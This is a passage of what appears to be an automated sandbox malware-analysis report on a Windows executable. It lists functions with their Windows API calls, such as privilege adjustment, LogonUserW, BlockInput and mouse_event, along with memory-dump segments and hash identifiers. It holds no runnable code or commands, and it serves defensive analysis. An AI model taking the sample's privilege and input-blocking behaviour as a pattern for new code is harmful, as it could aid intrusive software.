                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                • Opcode ID: d9c3f9a114deebdbc89b8db7cc476c0d210f9975e866258522a1479d8e23fd10
                                                • Instruction ID: eecf9756dfcee14134405b03a754a2ebf13fa9cf8616468bb0dd47f7eac55811
                                                • Opcode Fuzzy Hash: d9c3f9a114deebdbc89b8db7cc476c0d210f9975e866258522a1479d8e23fd10
                                                • Instruction Fuzzy Hash: 52118CF1514209AFD728AF64ED89E2BB7BDEF44710B20C16EF45697241EB34AC41CA64
                                                Function 007D4A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007D4A31
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007D4A48
                                                • FreeSid.ADVAPI32(?), ref: 007D4A58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 549869dc768664127715495444dd74abfa23099c17e59df42ac4f3f376957e90
                                                • Instruction ID: 0c753bd1df185d0612e14a34310e35deee78ce2201e24e9246fedccc7de329e1
                                                • Opcode Fuzzy Hash: 549869dc768664127715495444dd74abfa23099c17e59df42ac4f3f376957e90
                                                • Instruction Fuzzy Hash: AAF03C75A51208BFDB00DFE0DC89ABDBBB8EF08201F008469E501E2181DA745A048B54
                                                Function 0077E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76dd32fbea31d981d39ab39650f8b8a29316725b18d10cbb4d6de69aa03994d6
                                                • Instruction ID: 4e7d1a63f1016a9b63e5cccfe9a0a0666f389ac12cd65382e6c9f408cbdb2f11
                                                • Opcode Fuzzy Hash: 76dd32fbea31d981d39ab39650f8b8a29316725b18d10cbb4d6de69aa03994d6
                                                • Instruction Fuzzy Hash: B0229D70A00219DFDF24DF54C485ABEB7B1FF08354F24C5A9E85A9B351E378A981CB91
                                                Function 007DC75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DC787
                                                • FindClose.KERNEL32(00000000), ref: 007DC7B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 67c392f2caa319d8af3f7982d99b21b01767d607c258b47199df44a246012ec0
                                                • Instruction ID: 839252f68e6e9b8365cc56553d637bebb753ec09baed500fa4f36c87a0907dc2
                                                • Opcode Fuzzy Hash: 67c392f2caa319d8af3f7982d99b21b01767d607c258b47199df44a246012ec0
                                                • Instruction Fuzzy Hash: 1E118E326002009FDB10DF29C889A2AF7E9FF84320F00C51EFAA997390DB34A800CB81
                                                Function 007DA0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007E957D,?,007FFB84,?), ref: 007DA121
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007E957D,?,007FFB84,?), ref: 007DA133
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 7fc723475ab02c6104ab1c8c85a02668df557d25ea74b2ad4afa15a7b3d8bb35
                                                • Instruction ID: 0009d6a1d8be01461e8e45ed73d82900971e8a9a9a98169cc7f8cdd50afa75df
                                                • Opcode Fuzzy Hash: 7fc723475ab02c6104ab1c8c85a02668df557d25ea74b2ad4afa15a7b3d8bb35
                                                • Instruction Fuzzy Hash: 60F0823550522DFBDB10AFA4CC49FEA777CFF09361F008266F909D6281DA349944CBA1
                                                Function 007C84F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8631), ref: 007C8508
                                                • CloseHandle.KERNEL32(?,?,007C8631), ref: 007C851A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: a5e52e81d2763fd2a4a14d9ef91f4da6bd87d74bf7bdebc31c360153403ff87b
                                                • Instruction ID: df6b27dcb6995c55753c723e047c93bd6e1b2ea0c0b01c9f055140d9f2a10622
                                                • Opcode Fuzzy Hash: a5e52e81d2763fd2a4a14d9ef91f4da6bd87d74bf7bdebc31c360153403ff87b
                                                • Instruction Fuzzy Hash: 5EE0B672014611EEEB252B64FC09E777BAEEF44310714882DF49680470EF66ACA1DB94
                                                Function 0079A2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798ED7,?,?,?,00000001), ref: 0079A2DA
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A2E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: d2882755e8b234ae5a54a142f587dca1eb44d4e36a135d99b909151ca8de2e2c
                                                • Instruction ID: c86c6c654cecb55e989d2ed6a0d9d28f5884f137ee333d914fb3f5f45bd488ef
                                                • Opcode Fuzzy Hash: d2882755e8b234ae5a54a142f587dca1eb44d4e36a135d99b909151ca8de2e2c
                                                • Instruction Fuzzy Hash: CEB09231054208ABCA102B91EC09BA83F6AEF44AA2F408020F60D84060CF665450CA99
                                                Function 0079F359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8953b4374d1d07391f760557d2521c65e1584041f02bd12fc3150cc07b2e79ca
                                                • Instruction ID: f8dab79dcd989986d0b825a28545258a47e7326407a8de1054b00d7f29e7d32e
                                                • Opcode Fuzzy Hash: 8953b4374d1d07391f760557d2521c65e1584041f02bd12fc3150cc07b2e79ca
                                                • Instruction Fuzzy Hash: 24320562D29F014DDB639634D832336A249BFB73E4F15D737E829F5AA6EB28D4834100
                                                Function 007A25AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c47d9014470771eb7955be7751e5871602dd9ced32511ec4af770dc3541a0841
                                                • Instruction ID: 7f9e84e0d98ee142d856fe0441cd40bb0a6bc732d49b3c51841feb6b1a3e2864
                                                • Opcode Fuzzy Hash: c47d9014470771eb7955be7751e5871602dd9ced32511ec4af770dc3541a0841
                                                • Instruction Fuzzy Hash: 7FB11021E2AF404DD36796398831336BA5CBFBB6D5F52D71BFC2670E22EB2181834141
                                                Function 007D8932 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • __time64.LIBCMT ref: 007D8944
                                                  • Part of subcall function 0079537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007D9017,00000000,?,?,?,?,007D91C8,00000000,?), ref: 00795383
                                                  • Part of subcall function 0079537A: __aulldiv.LIBCMT ref: 007953A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem__aulldiv__time64
                                                • String ID:
                                                • API String ID: 2893107130-0
                                                • Opcode ID: 9fa157565e452f16b07cc6ab05eafb9196df1f4233f72ca4db5c1e01d12406fd
                                                • Instruction ID: 0a34062549f16e7fc98a539915184b25eaee07c5eb27c686cb714c8a35b523af
                                                • Opcode Fuzzy Hash: 9fa157565e452f16b07cc6ab05eafb9196df1f4233f72ca4db5c1e01d12406fd
                                                • Instruction Fuzzy Hash: 9821B472635510CBC729CF29D451B52B3E1EBA5310F288E6DE1E5CB2D0DA78B905CB54
                                                Function 007E401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 007E403A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 6ed8abaeb1aabff2cd6fdf7883b59f05991a6c31873106eab72b114a908953d0
                                                • Instruction ID: 37bcf88a93a763918961a4cf849d63810b1cd38b07380ab53becf8024209bcd0
                                                • Opcode Fuzzy Hash: 6ed8abaeb1aabff2cd6fdf7883b59f05991a6c31873106eab72b114a908953d0
                                                • Instruction Fuzzy Hash: C1E048312011149FCB10DF5AD404A9AFBE8AFA87A0F01C066FD49D7351DA74E841CB90
                                                Function 007D4CFA Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007D4D1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: ffb55e89522f20621655d00b52a83c4f8e0ccce9d25bbd20726d77f16e63d6b3
                                                • Instruction ID: e71111325c7dad1571225b338003a96a6e5a7500fab7ebc2c0d33edffb77d397
                                                • Opcode Fuzzy Hash: ffb55e89522f20621655d00b52a83c4f8e0ccce9d25bbd20726d77f16e63d6b3
                                                • Instruction Fuzzy Hash: 70D09EA43646057BFC280B30DC1FB76123AF300796FA4454B770A9A3C5A8FC5841A439
                                                Function 007C8A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C86B1), ref: 007C8A93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: ada548a1507e9b155c22a6f4f9225892dc479a249dd38c11ed93de64c7a4e4f4
                                                • Instruction ID: a7069c5790cca633f56aa038a197fbdb5761d4cb84eda0dc98882d36bf7f040c
                                                • Opcode Fuzzy Hash: ada548a1507e9b155c22a6f4f9225892dc479a249dd38c11ed93de64c7a4e4f4
                                                • Instruction Fuzzy Hash: ECD05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1CB75D835EB60
                                                Function 007B215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 007B2171
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: 67b2b5c7b7a6b787d21cf9d11579e8a3b4191c2775e9cee1bcd26726f25f7e19
                                                • Instruction ID: 8133f64545b2d6513bc723c9b6a9645feacc375b27b43d73e924ba9dbf8d0e35
                                                • Opcode Fuzzy Hash: 67b2b5c7b7a6b787d21cf9d11579e8a3b4191c2775e9cee1bcd26726f25f7e19
                                                • Instruction Fuzzy Hash: 66C04CF1811109DBCB05DB90D998DFE77BCAB04304F508055E101F2100DB789B44CB71
                                                Function 0079A2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 199bae77c952c1063dca6b289d8a7823840934d806520333e2c57c1031870e58
                                                • Instruction ID: f5fcb1f8bf6b5f1228b8e4defa6afb61b61419c6b4a8142c82eb532e1c40cd3e
                                                • Opcode Fuzzy Hash: 199bae77c952c1063dca6b289d8a7823840934d806520333e2c57c1031870e58
                                                • Instruction Fuzzy Hash: BCA0113000020CABCA002B82EC088A8BFAEEE002A0B008020F80C800228B32A8208A88
                                                Function 00788968 Relevance: .6, Instructions: 590COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f5823957dd3f3be2d2e6ae43e9ad8471368659d155dc3d936a4b9faba5451c3
                                                • Instruction ID: 77cd9f3205f4a973738b977a82077137af85f10dfd67876793d6f92bf2de7b85
                                                • Opcode Fuzzy Hash: 5f5823957dd3f3be2d2e6ae43e9ad8471368659d155dc3d936a4b9faba5451c3
                                                • Instruction Fuzzy Hash: 232237B0640555CBCF78AA28C494B7CBBA1FF81344FA8816ED8529B591EB3DEDC1C742
                                                Function 00792345 Relevance: .3, Instructions: 345COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: ef68cc63ed5108d6b2ddf479b873f396079f2b514726879cc292499f89ddaa56
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: A2C195322161930ADF2D8639A43403EBFA15AA27B235A075DE4B3DB1D6EF28C535D620
                                                Function 0079277A Relevance: .3, Instructions: 341COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: e86c2df0577c711e5ad7099a9f69d89110a3bb5a6b0945513acba94bde6748fe
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: F5C1A43320619309DF6D463AE43403EBFA15BA27B235A076DE8B2DB1D5EF28C535D620
                                                Function 00791AF8 Relevance: .3, Instructions: 323COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 3b9c1d5ba01f9263a928f697834f6ec6dc3eba84cca7eb41550e883bc41f038c
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: D8C1863221619309DF2D4639E43413EBFB25AA27B239A076DE4B3CB1C4EF28C574D620
                                                Function 007E791B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 007E7970
                                                • DeleteObject.GDI32(00000000), ref: 007E7982
                                                • DestroyWindow.USER32 ref: 007E7990
                                                • GetDesktopWindow.USER32 ref: 007E79AA
                                                • GetWindowRect.USER32(00000000), ref: 007E79B1
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007E7AF2
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007E7B02
